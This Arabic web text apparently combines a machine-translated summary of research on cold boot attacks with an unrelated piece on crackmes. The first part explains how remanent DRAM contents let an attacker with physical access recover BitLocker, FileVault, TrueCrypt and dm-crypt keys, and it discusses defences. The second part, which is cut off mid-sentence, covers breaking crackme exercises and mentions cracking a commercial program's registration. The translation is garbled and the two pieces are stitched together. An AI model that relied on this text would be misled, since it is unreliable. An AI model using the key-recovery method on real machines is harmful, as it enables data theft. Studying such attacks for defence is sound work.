أجهزة الكمبيوتر شبابيك إنترنت

يتم تشفير الإصدارات ثم اختراقها. قرصنة أنظمة تشفير القرص الصلب بالتمهيد البارد. نوم آمن

اكتشف باحثون في جامعة برينستون طريقة لتجاوز تشفير القرص الصلب باستخدام قدرة وحدات ذاكرة الوصول العشوائي (RAM) للاحتفاظ بالمعلومات لفترة قصيرة حتى بعد انقطاع التيار الكهربائي.

مقدمة

نظرًا لأنك تحتاج إلى مفتاح للوصول إلى محرك أقراص ثابت مشفر ، وهو بالطبع مخزن في ذاكرة الوصول العشوائي ، فكل ما تحتاجه هو الوصول الفعلي إلى جهاز الكمبيوتر لبضع دقائق. بعد إعادة التشغيل من محرك أقراص ثابت خارجي أو USB Flash ، يتم إجراء تفريغ ذاكرة كامل ويتم استخراج مفتاح الوصول منه في غضون بضع دقائق.

بهذه الطريقة ، يمكنك الحصول على مفاتيح التشفير (والوصول الكامل إلى القرص الصلب) التي تستخدمها BitLocker و FileVault و dm-crypt على أنظمة تشغيل Windows Vista و Mac OS X و Linux ، بالإضافة إلى نظام تشفير القرص الصلب المجاني الشهير تروكربت.

تكمن أهمية هذا العمل في حقيقة أنه لا توجد طريقة بسيطة للحماية من طريقة القرصنة هذه ، باستثناء فصل الطاقة لفترة كافية لمحو البيانات تمامًا.

يتم تقديم عرض مرئي للعملية بتنسيق فيديو.

حاشية. ملاحظة

خلافًا للاعتقاد الشائع ، فإن ذاكرة DRAM المستخدمة في معظم أجهزة الكمبيوتر الحديثة تحتفظ بالبيانات حتى بعد انقطاع التيار لعدة ثوانٍ أو دقائق ، علاوة على ذلك ، يحدث هذا في درجة حرارة الغرفة وحتى إذا تمت إزالة الشريحة من اللوحة الأم. هذه المرة كافية لأخذ تفريغ كامل لذاكرة الوصول العشوائي. سنبين أن هذه الظاهرة تسمح للمهاجم الذي لديه وصول مادي إلى النظام بتجاوز وظائف نظام التشغيل لحماية البيانات حول مفاتيح التشفير. سنوضح كيف يمكن استخدام إعادة التشغيل لتنفيذ هجمات ناجحة على أنظمة تشفير محركات الأقراص الثابتة المعروفة دون استخدام أي أجهزة أو مواد متخصصة. سنحدد بشكل تجريبي درجة واحتمالية الاحتفاظ بالبقايا ونبين أن الوقت الذي يمكن أن تؤخذ فيه البيانات يمكن زيادته بشكل كبير باستخدام الحيل البسيطة. سيتم أيضًا اقتراح طرق جديدة للعثور على مفاتيح التشفير في تفريغ الذاكرة وتصحيح الأخطاء المرتبطة بالبتات المفقودة. سنتحدث أيضًا عن عدة طرق لتقليل هذه المخاطر ، لكننا لا نعرف حلًا بسيطًا.

مقدمة

يفترض معظم الخبراء أن البيانات من ذاكرة الوصول العشوائي للكمبيوتر يتم مسحها على الفور تقريبًا بعد انقطاع التيار الكهربائي ، أو يعتبرون أن البيانات المتبقية من الصعب للغاية استردادها دون استخدام معدات خاصة. سوف نظهر أن هذه الافتراضات غير صحيحة. تفقد ذاكرة DRAM التقليدية البيانات تدريجيًا على مدار عدة ثوانٍ ، حتى في درجات الحرارة العادية ، وحتى إذا تمت إزالة شريحة الذاكرة من اللوحة الأم ، فستبقى البيانات فيها لدقائق أو حتى ساعات ، بشرط تخزين الشريحة في درجات حرارة منخفضة. يمكن استعادة البيانات المتبقية باستخدام طرق بسيطة تتطلب وصولًا ماديًا قصير المدى إلى الكمبيوتر.

سوف نعرض عددًا من الهجمات التي ستسمح لنا باستعادة مفاتيح التشفير المخزنة في الذاكرة باستخدام التأثيرات المتبقية للذاكرة. هذا يشكل تهديدًا حقيقيًا لمستخدمي الكمبيوتر المحمول الذين يعتمدون على أنظمة تشفير محرك الأقراص الثابتة. في الواقع ، إذا سرق المهاجم جهاز كمبيوتر محمول ، في الوقت الذي يتم فيه توصيل القرص المشفر ، فسيكون قادرًا على تنفيذ إحدى هجماتنا للوصول إلى المحتويات ، حتى لو كان الكمبيوتر المحمول نفسه مغلقًا أو في وضع السكون. سنبرهن على ذلك من خلال مهاجمة العديد من أنظمة التشفير الشائعة بنجاح مثل BitLocker و TrueCrypt و FileVault. يجب أن تكون هذه الهجمات ناجحة أيضًا ضد أنظمة التشفير الأخرى.

على الرغم من أننا ركزنا جهودنا على أنظمة تشفير محرك الأقراص الثابتة ، في حالة الوصول المادي إلى جهاز كمبيوتر المهاجم ، يمكن أن تصبح أي معلومات مهمة مخزنة في ذاكرة الوصول العشوائي هدفًا للهجوم. من المحتمل أن تكون العديد من أنظمة الأمان الأخرى عرضة للخطر. على سبيل المثال ، اكتشفنا أن نظام التشغيل Mac OS X يترك كلمات مرور الحساب في الذاكرة حيث يمكننا استردادها ، كما هاجمنا مفاتيح RSA الخاصة بخادم الويب Apache.

كان البعض في مجتمعات أمن المعلومات وفيزياء أشباه الموصلات على دراية بالفعل بتأثير بقايا الذاكرة الحيوية ، ولم يكن هناك سوى القليل جدًا من المعلومات حول هذا الموضوع. نتيجة لذلك ، فإن العديد من الذين يصممون أنظمة الأمان أو يطورونها أو يستخدمونها ليسوا على دراية بهذه الظاهرة ومدى سهولة استغلالها من قبل المهاجم. على حد علمنا ، هذا هو العمل التفصيلي الأول لفحص الآثار المترتبة على هذه الظواهر لأمن المعلومات.

الهجمات على محركات الأقراص المشفرة

يعد تشفير محركات الأقراص الثابتة طريقة معروفة للحماية من سرقة البيانات. يعتقد الكثيرون أن أنظمة تشفير محرك الأقراص الثابتة ستحمي بياناتهم ، حتى لو تمكن المهاجم من الوصول المادي إلى الكمبيوتر (في الواقع ، هناك حاجة إليها لهذا ، محرر). يتطلب قانون ولاية كاليفورنيا ، الذي تم تمريره في عام 2002 ، الإبلاغ عن عمليات الكشف المحتملة عن البيانات الشخصية فقط إذا لم يتم تشفير البيانات ، لأن. يعتبر تشفير البيانات إجراء وقائيًا كافيًا. على الرغم من أن القانون لا يصف أي حلول تقنية محددة ، إلا أن العديد من الخبراء يوصون باستخدام محرك الأقراص الثابتة أو أنظمة تشفير الأقسام ، والتي تعتبر تدابير كافية للحماية. أظهرت نتائج دراستنا أن الاعتقاد في تشفير القرص لا أساس له من الصحة. يمكن للمهاجم ، بعيدًا عن كونه الأكثر مهارة ، تجاوز العديد من أنظمة التشفير المستخدمة على نطاق واسع في حالة سرقة جهاز كمبيوتر محمول به بيانات أثناء تشغيله أو في وضع السكون. ويمكن قراءة البيانات الموجودة على الكمبيوتر المحمول حتى لو كانت على محرك أقراص مشفر ، لذا فإن استخدام أنظمة تشفير محرك الأقراص الثابتة ليس مقياسًا كافيًا.

استخدمنا عدة أنواع من الهجمات على أنظمة تشفير محركات الأقراص الثابتة المعروفة. استغرق تثبيت الأقراص المشفرة والتحقق من صحة مفاتيح التشفير المكتشفة معظم الوقت. استغرق الحصول على صورة RAM والبحث عن المفاتيح بضع دقائق فقط وكان آليًا بالكامل. هناك سبب للاعتقاد بأن معظم أنظمة تشفير محرك الأقراص الثابتة عرضة لمثل هذه الهجمات.

bitlocker

BitLocker هو نظام مضمن في بعض إصدارات Windows Vista. يعمل كمحرك بين نظام الملفات ومحرك القرص الصلب ، حيث يقوم بتشفير وفك تشفير القطاعات المحددة عند الطلب. المفاتيح المستخدمة للتشفير موجودة في ذاكرة الوصول العشوائي طالما أن القرص المشفر غير مثبت.

لتشفير كل قطاع من محرك الأقراص الثابتة ، يستخدم BitLocker نفس زوج المفاتيح الذي تم إنشاؤه بواسطة خوارزمية AES: مفتاح تشفير قطاع ومفتاح تشفير يعملان في وضع تسلسل كتلة التشفير (CBC). يتم تشفير هذين المفتاحين بدوره باستخدام المفتاح الرئيسي. لتشفير قطاع ، يتم تنفيذ إجراء ثنائي لإضافة نص عادي باستخدام مفتاح جلسة تم إنشاؤه عن طريق تشفير بايت إزاحة القطاع باستخدام مفتاح تشفير القطاع. بعد ذلك ، تتم معالجة البيانات المستلمة من خلال وظيفتي خلط تستخدمان خوارزمية Elephant التي طورتها Microsoft. تُستخدم هذه الوظائف بدون مفتاح لزيادة عدد التغييرات على جميع بتات التشفير ، وبالتالي زيادة عدم اليقين في بيانات القطاع المشفرة. في المرحلة الأخيرة ، يتم تشفير البيانات باستخدام خوارزمية AES في وضع CBC ، باستخدام مفتاح التشفير المناسب. يتم تحديد متجه التهيئة عن طريق تشفير بايت إزاحة القطاع باستخدام مفتاح التشفير المستخدم في وضع CBC.

لقد قمنا بتنفيذ هجوم تجريبي مؤتمت بالكامل يسمى BitUnlocker. يستخدم هذا محرك أقراص USB خارجيًا مع نظام تشغيل Linux ومحمل إقلاع معدل استنادًا إلى SYSLINUX وبرنامج تشغيل FUSE الذي يسمح لك بتوصيل محركات BitLocker المشفرة بنظام التشغيل Linux. على كمبيوتر اختباري يعمل بنظام التشغيل Windows Vista ، تم إيقاف تشغيل الطاقة ، وتم توصيل محرك أقراص USB الثابت ، وتم التمهيد منه. بعد ذلك ، قام BitUnlocker بإفراغ ذاكرة الوصول العشوائي تلقائيًا إلى محرك أقراص خارجي ، والبحث عن مفاتيح محتملة باستخدام برنامج keyfind ، وجرب جميع الخيارات المناسبة (أزواج من مفتاح تشفير القطاع ومفتاح وضع CBC) ، وإذا نجح ذلك ، فقم بتوصيل محرك الأقراص المشفر . بمجرد توصيل القرص ، أصبح من الممكن العمل معه مثل أي قرص آخر. على كمبيوتر محمول حديث بسعة 2 غيغابايت من ذاكرة الوصول العشوائي ، استغرقت العملية حوالي 25 دقيقة.

يشار إلى أن هذا الهجوم أصبح ممكناً تنفيذه بدون هندسة عكسية لأي برنامج. تصف وثائق Microsoft نظام BitLocker بشكل كافٍ لفهم دور مفتاح تشفير القطاع ومفتاح وضع CBC وإنشاء البرنامج الخاص بك الذي ينفذ العملية بأكملها.

يتمثل الاختلاف الرئيسي بين BitLocker والبرامج الأخرى من هذه الفئة في الطريقة التي يتم بها تخزين المفاتيح عند فصل محرك الأقراص المشفر. بشكل افتراضي ، في الوضع الأساسي ، يحمي BitLocker المفتاح الرئيسي فقط بمساعدة وحدة TPM ، الموجودة في العديد من أجهزة الكمبيوتر الحديثة. هذه الطريقة ، التي يبدو أنها مستخدمة على نطاق واسع ، معرضة بشكل خاص لهجومنا ، لأنها تتيح لك الحصول على مفاتيح التشفير حتى إذا تم إيقاف تشغيل الكمبيوتر لفترة طويلة ، لأنه عند بدء تشغيل الكمبيوتر ، يتم تحميل المفاتيح تلقائيًا في ذاكرة الوصول العشوائي (حتى نافذة تسجيل الدخول) دون إدخال أي بيانات مصادقة.

على ما يبدو ، فإن خبراء Microsoft على دراية بهذه المشكلة وبالتالي يوصون بتكوين BitLocker في وضع محسّن ، حيث تكون المفاتيح محمية ليس فقط بمساعدة TPM ، ولكن أيضًا بكلمة مرور أو مفتاح على محرك أقراص USB خارجي. ولكن ، حتى في هذا الوضع ، يكون النظام ضعيفًا إذا تمكن المهاجم من الوصول المادي إلى جهاز الكمبيوتر أثناء تشغيله (يمكن حتى أن يكون مقفلًا أو في وضع السكون ، (الحالات - تم إيقاف تشغيله أو إسباته في هذه الحالة لا يتأثر بهذا الهجوم).

قبو ملف

تم إجراء بحث جزئي على نظام FileVault من Apple وهندسته العكسية. في نظام التشغيل Mac OS X 10.4 ، يستخدم FileVault مفتاح 128 بت AES في وضع CBC. عند إدخال كلمة مرور المستخدم ، يتم فك تشفير عنوان يحتوي على مفتاح AES ومفتاح K2 ثانٍ ، ويستخدمان لحساب متجهات التهيئة. يتم حساب متجه التهيئة لكتلة القرص Ith على أنه HMAC-SHA1 K2 (I).

استخدمنا برنامج EFI الخاص بنا لالتقاط صور RAM لاسترداد البيانات من كمبيوتر Macintosh (استنادًا إلى معالج Intel) مع توصيل محرك أقراص FileVault المشفر. ثم وجد برنامج Keyfind مفاتيح FileVault AES تلقائيًا دون أخطاء.

بدون متجه التهيئة ، ولكن باستخدام مفتاح AES المستلم ، يصبح من الممكن فك تشفير 4080 من أصل 4096 بايت لكل كتلة قرص (كل شيء باستثناء كتلة AES الأولى). لقد تأكدنا من أن متجه التهيئة موجود أيضًا في التفريغ. بافتراض أن البيانات لم يتم إتلافها ، يمكن للمهاجم تحديد المتجه من خلال تجربة جميع سلاسل 160 بت في التفريغ واحدة تلو الأخرى والتحقق مما إذا كان بإمكانها تكوين نص عادي محتمل عند إضافتها إلى الجزء الأول الذي تم فك تشفيره من منع. معًا ، يتيح لك استخدام برامج مثل vilefault ومفاتيح AES وناقل التهيئة فك تشفير القرص المشفر تمامًا.

أثناء التحقيق في FileVault ، وجدنا أن نظام التشغيل Mac OS X 10.4 و 10.5 يترك نسخًا متعددة من كلمة مرور المستخدم في الذاكرة ، حيث يكونون عرضة لهذا الهجوم. غالبًا ما تُستخدم كلمات مرور الحساب لحماية المفاتيح ، والتي يمكن استخدامها بدورها لحماية عبارات المرور على محركات الأقراص المشفرة باستخدام FileVault.

تروكربت

TrueCrypt هو نظام تشفير مفتوح المصدر شائع يعمل على أنظمة Windows و MacOS و Linux. يدعم العديد من الخوارزميات بما في ذلك AES و Serpent و Twofish. في الإصدار 4 ، عملت جميع الخوارزميات في وضع LRW ؛ في الإصدار الخامس الحالي ، يستخدمون وضع XTS. يقوم TrueCrypt بتخزين مفتاح التشفير ومفتاح القرص في رأس القسم على كل محرك أقراص ، والذي يتم تشفيره بمفتاح مختلف مشتق من كلمة المرور التي أدخلها المستخدم.

اختبرنا TrueCrypt 4.3a و 5.0a يعملان على نظام Linux OS. قمنا بتوصيل قرص مشفر بمفتاح AES 256 بت ، ثم أوقفنا الطاقة واستخدمنا برنامج تفريغ الذاكرة الخاص بنا للتمهيد. في كلتا الحالتين ، عثر keyfind على مفتاح تشفير سليم 256 بت. أيضًا ، في حالة TrueCrypt 5.0.a ، كان keyfind قادرًا على استعادة مفتاح قرص وضع XTS.

لفك تشفير الأقراص التي تم إنشاؤها بواسطة TrueCrypt 4 ، تحتاج إلى تعديل مفتاح الوضع LRW. وجدنا أن النظام يخزنه في أربع كلمات قبل الجدول الزمني الرئيسي لمفتاح AES. في تفريغنا ، لم يكن مفتاح LRW تالفًا. (في حالة حدوث أخطاء ، سنظل قادرين على استعادة المفتاح).

DM- كريبت

نواة Linux ، بدءًا من الإصدار 2.6 ، تتضمن دعمًا مضمنًا لـ dm-crypt ، وهو نظام فرعي لتشفير القرص. يستخدم Dm-crypt العديد من الخوارزميات والأنماط ، ولكنه يستخدم افتراضيًا تشفير AES 128 بت في وضع CBC مع متجهات التهيئة غير القائمة على المفتاح.

اختبرنا قسم dm-crypt الذي تم إنشاؤه باستخدام فرع LUKS (إعداد Linux الموحد للمفاتيح) من الأداة المساعدة cryptsetup و 2.6.20 kernel. تم تشفير القرص باستخدام AES في وضع CBC. قمنا بإيقاف تشغيل الطاقة لفترة من الوقت وباستخدام محمل إقلاع PXE معدل ، قمنا بتفريغ الذاكرة. عثر برنامج Keyfind على مفتاح AES صالح 128 بت ، والذي تم استرداده دون أي أخطاء. بعد استعادته ، يمكن للمهاجم فك تشفير القسم المشفر dm-crypt وتركيبه عن طريق تعديل أداة إعداد التشفير بحيث تقبل المفاتيح بالتنسيق المطلوب.

طرق الحماية وقيودها

إن تنفيذ الحماية ضد الهجمات على ذاكرة الوصول العشوائي ليس بالأمر الهين ، حيث يجب تخزين مفاتيح التشفير المستخدمة في مكان ما. نقترح التركيز على تدمير المفاتيح أو إخفائها قبل أن يتمكن المهاجم من الوصول المادي إلى جهاز الكمبيوتر ، ومنع تشغيل برنامج تفريغ الذاكرة الرئيسي ، وحماية شرائح ذاكرة الوصول العشوائي فعليًا ، وتقليل عمر البيانات الموجودة في ذاكرة الوصول العشوائي ، إن أمكن.

الكتابة فوق الذاكرة

بادئ ذي بدء ، من الضروري ، إن أمكن ، تجنب تخزين المفاتيح في ذاكرة الوصول العشوائي. من الضروري الكتابة فوق المعلومات الأساسية عند عدم استخدامها ، ومنع نسخ البيانات لمبادلة الملفات. يجب مسح الذاكرة مسبقًا عن طريق نظام التشغيل أو مكتبات إضافية. بطبيعة الحال ، لن تحمي هذه الإجراءات المفاتيح المستخدمة حاليًا ، حيث يجب الاحتفاظ بها في الذاكرة ، مثل تلك المستخدمة للأقراص المشفرة أو على خوادم الويب الآمنة.

أيضًا ، يجب مسح ذاكرة الوصول العشوائي أثناء عملية التمهيد. يمكن تكوين بعض أجهزة الكمبيوتر لمسح ذاكرة الوصول العشوائي عند التمهيد باستخدام طلب POST واضح (اختبار ذاتي للتشغيل) قبل تمهيد نظام التشغيل. إذا لم يتمكن المهاجم من منع تنفيذ هذا الطلب ، فلن يكون قادرًا على هذا الكمبيوتر الشخصي على تفريغ ذاكرة بمعلومات مهمة. ولكن ، لا يزال أمامه فرصة لسحب شرائح ذاكرة الوصول العشوائي وإدخالها في جهاز كمبيوتر آخر باستخدام إعدادات BIOS التي يحتاجها.

تقييد التنزيلات من الشبكة أو من الوسائط القابلة للإزالة

تم تنفيذ العديد من هجماتنا باستخدام تمهيد الشبكة أو الوسائط القابلة للإزالة. يجب تكوين جهاز الكمبيوتر للمطالبة بكلمة مرور مسؤول للتمهيد من هذه المصادر. ولكن ، تجدر الإشارة إلى أنه حتى إذا تم تكوين النظام للتمهيد فقط من محرك الأقراص الثابتة الرئيسي ، يمكن للمهاجم تغيير محرك الأقراص الثابتة نفسه ، أو في كثير من الحالات ، إعادة تعيين NVRAM للكمبيوتر للعودة إلى إعدادات BIOS الأصلية.

نوم آمن

أظهرت نتائج الدراسة أن مجرد قفل سطح مكتب الكمبيوتر الشخصي (أي أن نظام التشغيل يستمر في العمل ، ولكن لبدء التفاعل معه ، يجب إدخال كلمة مرور) لا يحمي محتويات ذاكرة الوصول العشوائي. وضع السكون غير فعال حتى إذا تم حظر الكمبيوتر عند العودة من وضع السكون ، لأن المهاجم يمكنه تنشيط العودة من وضع السكون ، ثم إعادة تشغيل الكمبيوتر المحمول وإجراء تفريغ للذاكرة. لن يساعد وضع السبات (يتم نسخ محتويات ذاكرة الوصول العشوائي إلى القرص الثابت) ، إلا عند استخدام المعلومات الأساسية على الوسائط المنفصلة لاستعادة التشغيل العادي.

مع معظم أنظمة تشفير القرص الصلب ، يمكن للمستخدمين حماية أنفسهم عن طريق إغلاق جهاز الكمبيوتر. (يظل نظام Bitlocker في الوضع الأساسي لوحدة TPM ضعيفًا ، حيث سيتم توصيل محرك الأقراص تلقائيًا عند تشغيل الكمبيوتر). قد يتم الاحتفاظ بمحتويات الذاكرة لفترة قصيرة بعد إيقاف تشغيلها ، لذلك يوصى بمراقبة محطة العمل الخاصة بك لبضع دقائق أخرى. على الرغم من فعاليته ، إلا أن هذا الإجراء غير مريح للغاية بسبب التحميل الطويل لمحطات العمل.

يمكن تأمين الإسبات بالطرق التالية: طلب كلمة مرور أو سر آخر "لتنبيه" محطة العمل ، وتشفير محتويات الذاكرة بمفتاح مشتق من كلمة المرور هذه. يجب أن تكون كلمة المرور قوية ، حيث يمكن للمهاجم إجراء تفريغ للذاكرة ثم محاولة تخمين كلمة المرور بالقوة الغاشمة. إذا لم يكن من الممكن تشفير الذاكرة بالكامل ، فيجب تشفير المناطق التي تحتوي على معلومات أساسية فقط. قد يتم تكوين بعض الأنظمة لإدخال هذا النوع من السكون المحمي ، على الرغم من أن هذا ليس هو الإعداد الافتراضي عادةً.

رفض الحسابات المسبقة

أظهر بحثنا أن استخدام الحساب المسبق لتسريع عمليات التشفير يجعل المعلومات الأساسية أكثر عرضة للخطر. تؤدي عملية الحوسبة المسبقة إلى حقيقة أنه توجد في الذاكرة معلومات زائدة عن البيانات الرئيسية ، مما يسمح للمهاجم باستعادة المفاتيح حتى في حالة وجود أخطاء. على سبيل المثال ، كما هو موضح في القسم 5 ، تعتبر المعلومات حول مفاتيح التكرار لخوارزميات AES و DES زائدة عن الحاجة ومفيدة للمهاجم.

سيؤدي رفض العمليات الحسابية المسبقة إلى تقليل الأداء ، حيث سيتعين تكرار الحسابات التي يحتمل أن تكون معقدة. ولكن ، على سبيل المثال ، يمكنك تخزين القيم المحسوبة مسبقًا مؤقتًا لفترة زمنية معينة ومسح البيانات المستلمة إذا لم يتم استخدامها خلال هذا الفاصل الزمني. يمثل هذا الأسلوب حلاً وسطاً بين الأمان وأداء النظام.

توسيع مفتاح

هناك طريقة أخرى لمنع استرداد المفتاح وهي تعديل المعلومات الأساسية المخزنة في الذاكرة بطريقة تجعل استرداد المفتاح أكثر صعوبة بسبب الأخطاء المختلفة. تم النظر في هذه الطريقة من الناحية النظرية ، حيث تبين أن الوظيفة مقاومة للكشف ، والتي تظل مدخلاتها مخفية حتى لو تم اكتشاف جميع المخرجات تقريبًا ، وهو ما يشبه إلى حد بعيد تشغيل الوظائف أحادية الاتجاه.

من الناحية العملية ، تخيل أن لدينا مفتاح AES 256 بت K غير مستخدم حاليًا ولكن ستكون هناك حاجة إليه لاحقًا. لا يمكننا استبدالها ، لكننا نريد أن نجعلها مقاومة لمحاولات الاسترداد. تتمثل إحدى طرق تحقيق ذلك في تخصيص منطقة بيانات B بت كبيرة ، وتعبئتها ببيانات عشوائية R ، ثم تخزين نتيجة التحويل التالي K + H (R) في الذاكرة (تجميع ثنائي ، تقريبًا) ، حيث H هي دالة تجزئة ، مثل SHA-256.

تخيل الآن أنه تم قطع الكهرباء ، سيؤدي ذلك إلى تغيير d بت في هذه المنطقة. إذا كانت وظيفة التجزئة قوية ، فعند محاولة استرداد المفتاح K ، يمكن للمهاجم الاعتماد فقط على قدرته على تخمين أي أجزاء من المنطقة B تم تغييرها من حوالي النصف التي كان من الممكن تغييرها. إذا تم تغيير d بت ، فسيتعين على المهاجم البحث عن منطقة بحجم (B / 2 + d) / d للعثور على القيم الصحيحة لـ R ثم استعادة المفتاح K. إذا كانت المنطقة B كبيرة ، يمكن أن يكون هذا البحث طويلاً جدًا ، حتى لو كانت d صغيرة نسبيًا.

نظريًا ، يمكننا تخزين جميع المفاتيح بهذه الطريقة ، وحساب كل مفتاح فقط عندما نحتاج إليه ، وحذفه عندما لا نحتاج إليه. وبالتالي ، من خلال تطبيق الطريقة المذكورة أعلاه ، يمكننا تخزين المفاتيح في الذاكرة.

الحماية المادية

اعتمدت بعض هجماتنا على الوصول المادي إلى شرائح الذاكرة. يمكن منع مثل هذه الهجمات عن طريق حماية الذاكرة المادية. على سبيل المثال ، يتم الاحتفاظ بوحدات الذاكرة في علبة كمبيوتر مغلقة ، أو مختومة بالإيبوكسي لمنع محاولات إزالتها أو الوصول إليها. أيضًا ، من الممكن تنفيذ الكتابة فوق الذاكرة كاستجابة لدرجات الحرارة المنخفضة أو محاولات فتح العلبة. ستتطلب هذه الطريقة تركيب أجهزة استشعار بنظام إمداد طاقة مستقل. تشتمل العديد من هذه الطرق على أجهزة غير قابلة للتلاعب (مثل معالج IBM 4758) ويمكن أن تزيد بشكل كبير من تكلفة محطة العمل. من ناحية أخرى ، فإن استخدام الذاكرة الملحومة على اللوحة الأم أرخص بكثير.

تغيير العمارة

يمكنك تغيير بنية جهاز الكمبيوتر. وهو أمر مستحيل بالنسبة لأجهزة الكمبيوتر المستخدمة بالفعل ، ولكنه سيسمح لك بتأمين أجهزة جديدة.

النهج الأول هو تصميم وحدات DRAM بطريقة تمحو جميع البيانات بشكل أسرع. قد يكون هذا أمرًا صعبًا لأن هدف محو البيانات بأسرع ما يمكن يتعارض مع الهدف الآخر المتمثل في عدم فقد البيانات بين فترات تحديث الذاكرة.

هناك طريقة أخرى تتمثل في إضافة أجهزة تخزين رئيسية مضمونة لمسح جميع المعلومات من تخزينها عند بدء التشغيل وإعادة التشغيل وإيقاف التشغيل. وبالتالي ، سنحصل على مكان آمن لتخزين عدة مفاتيح ، على الرغم من بقاء الثغرة الأمنية المرتبطة بحساباتهم المسبقة.

اقترح خبراء آخرون بنية يتم فيها تشفير محتويات الذاكرة بشكل دائم. بالإضافة إلى ذلك ، إذا قمت بتنفيذ مسح المفاتيح عند إعادة التشغيل وانقطاع التيار الكهربائي ، فستوفر هذه الطريقة حماية كافية ضد الهجمات التي وصفناها.

موثوقة الحوسبة

الأجهزة المتوافقة مع مفهوم "الحوسبة الموثوقة" ، على سبيل المثال ، في شكل وحدات TPM ، مستخدمة بالفعل في بعض أجهزة الكمبيوتر. على الرغم من فائدتها في الحماية من بعض الهجمات ، في شكلها الحالي ، فإن هذه المعدات لا تساعد في منع الهجمات التي وصفناها.

لا تنفذ وحدات TPM النمطية المستخدمة تشفيرًا كاملاً. بدلاً من ذلك ، يشاهدون عملية التمهيد لتحديد ما إذا كان من الآمن تشغيل المفتاح في ذاكرة الوصول العشوائي أم لا. إذا احتاج البرنامج إلى استخدام المفتاح ، فيمكن تنفيذ التقنية التالية: لن يتم تخزين المفتاح ، في شكل قابل للاستخدام ، في ذاكرة الوصول العشوائي حتى تسير عملية التمهيد وفقًا للسيناريو المتوقع. ولكن بمجرد أن يكون المفتاح في ذاكرة الوصول العشوائي ، يصبح على الفور هدفًا لهجماتنا. يمكن لوحدات TPM أن تمنع تحميل المفتاح في الذاكرة ، لكنها لا تمنعه ​​من القراءة من الذاكرة.

الموجودات

خلافًا للاعتقاد الشائع ، تقوم وحدات DRAM بتخزين البيانات لفترة طويلة نسبيًا عند تعطيلها. أظهرت تجاربنا أن هذه الظاهرة تجعل من الممكن تنفيذ فئة كاملة من الهجمات التي تسمح لك بالحصول على البيانات المهمة ، مثل مفاتيح التشفير ، من ذاكرة الوصول العشوائي ، على الرغم من محاولات نظام التشغيل لحماية محتوياتها. الهجمات التي نصفها قابلة للتحقيق في الممارسة العملية ، وأمثلةنا للهجمات على أنظمة التشفير الشائعة تثبت ذلك.

لكن الأنواع الأخرى من البرامج معرضة للخطر أيضًا. غالبًا ما تستخدم أنظمة إدارة الحقوق الرقمية (DRM) مفاتيح متماثلة مخزنة في الذاكرة ، ويمكن أيضًا الحصول عليها باستخدام الطرق الموضحة. كما أوضحنا ، فإن خوادم الويب التي تدعم SSL معرضة للخطر أيضًا لأنها تخزن في الذاكرة المفاتيح الخاصة اللازمة لإنشاء جلسات SSL. من المحتمل أن تكون طرق البحث عن المعلومات الأساسية فعالة في العثور على كلمات المرور وأرقام الحسابات وأي معلومات مهمة أخرى مخزنة في ذاكرة الوصول العشوائي.

يبدو أنه لا توجد طريقة سهلة للقضاء على نقاط الضعف الموجودة. من المرجح ألا يكون تغيير البرنامج فعالاً ؛ ستساعد تغييرات الأجهزة ، لكن تكاليف الوقت والموارد ستكون عالية ؛ كما أن تقنية "الحوسبة الموثوقة" بشكلها الحالي ليست فعالة للغاية ، لأنها لا تستطيع حماية المفاتيح الموجودة في الذاكرة.

في رأينا ، أجهزة الكمبيوتر المحمولة التي غالبًا ما تكون في الأماكن العامة وتعمل في أوضاع معرضة لهذه الهجمات هي الأكثر عرضة لهذا الخطر. يُظهر وجود مثل هذه المخاطر أن تشفير القرص يحمي البيانات المهمة إلى حد أقل مما يُعتقد عمومًا.

نتيجة لذلك ، قد تضطر إلى اعتبار ذاكرة DRAM مكونًا غير موثوق به لجهاز كمبيوتر حديث ، وتجنب معالجة المعلومات السرية المهمة فيه. لكن هذا ليس عمليًا في الوقت الحالي ، حتى تتغير بنية أجهزة الكمبيوتر الحديثة للسماح للبرنامج بتخزين المفاتيح في مكان آمن.

المقدمة

كراكمي عليه
برنامج (عادة صغير الحجم 1-2
كيلوبايت) التي تحتاج إلى تخمين كلمة المرور الخاصة بها
أو اصنع مفتاح. عادة ما يكتب Krakmi
للتحقق من مستوى معرفة الناس في هذا المجال
برامج التشفير والقرصنة. كراك ميل
جاء من العبارة الإنجليزية Crack Me -
صدعني.

بطريقة ما بالنسبة لي
كان مطلوبًا لإدراج دعم لـ "التسجيل"
مفاتيح أحد البرامج التجارية. على ال
كانت تلك اللحظة من الخبرة في هذا الأمر
قليلًا جدًا ، بطريقة ما حاولت الاختراق
القليل من الكراك ، لكن لا شيء يعمل وأنا
رمى بسرعة. لكن عندما جاء الحافز ، أنا
قررت أن أبدأ مع crackme وأنا أفعل ذلك الآن
تعلم خوارزميات التشفير المختلفة
البيانات (مثل DES و TWODES و RSA وغيرها). تمامًا
من الممكن أن تكون مقالاتي القادمة حول
خوارزميات التشفير
استخدام هذه الخوارزميات بشكل ملحوظ
يزيد الوقت الذي يقضيه في القرصنة.

أنواع الكراكمي

مع مراعاة
مختلف الشقوق ، خصصت اثنين من الشقوق الرئيسية
النوع: crakmi المشفر ويحتوي على
مجرد خوارزمية.

فك
يحتوي عادة كراكمي من النوع الأول
العديد من "الحيل" المضادة لتصحيح الأخطاء (التعقيد
من هذه التقنيات يعتمد على مستوى المعرفة
الشخص الذي كتب الكراكمي أكثر من غيره
يتم تجاوز الحيل الشائعة بسهولة
الناس والمصححين الذين يعملون تحت
الوضع المحمي وقبل ذلك
لبدء تحليل الخوارزمية ، يجب أن تحصل على
كود فك. الاصعب
فك ، (على الأرجح) أكثر صعوبة
ستكون هناك خوارزمية لاختيار كلمة مرور (أو كلمات مرور)
له. في كثير من الأحيان اتضح ذلك
يمكن أن يكون من الصعب كسر خوارزمية 300 بايت ،
من فك كراكمي. بدون علم
علماء الرياضيات أيضا لا ينصحون بكسر الشقوق
التي تستخدم خوارزمية RSA (خوارزمية
تشفير البيانات بمفتاح عام) أو
مشابه. بطبيعة الحال ، من الأفضل أن تبدأ
شقوق غير مشفرة. أنا أيضا لا أوصي
في محاولة لكسر الكراكمي من مجموعات UCL و UCF و rPG و SOS
- أنت فقط تضيع وقتك.

في بعض
لا يحتاج كراكمي إلى معرفة كلمة المرور ، ولكن
عمل مفتاح التسجيل. معالجة
الخردة مثل crakmi ليس كثيرًا
تختلف عن "كلمة المرور" ، لكنها أكثر "تقريبية"
لكسر البرامج.

كسر الخوارزمية
كراكمي

شقوق معقدة
كسر بواسطة كلمات مرور القوة الغاشمة ، لـ
برامج صغيرة مكتوبة لهذا الغرض. في كثير من الأحيان
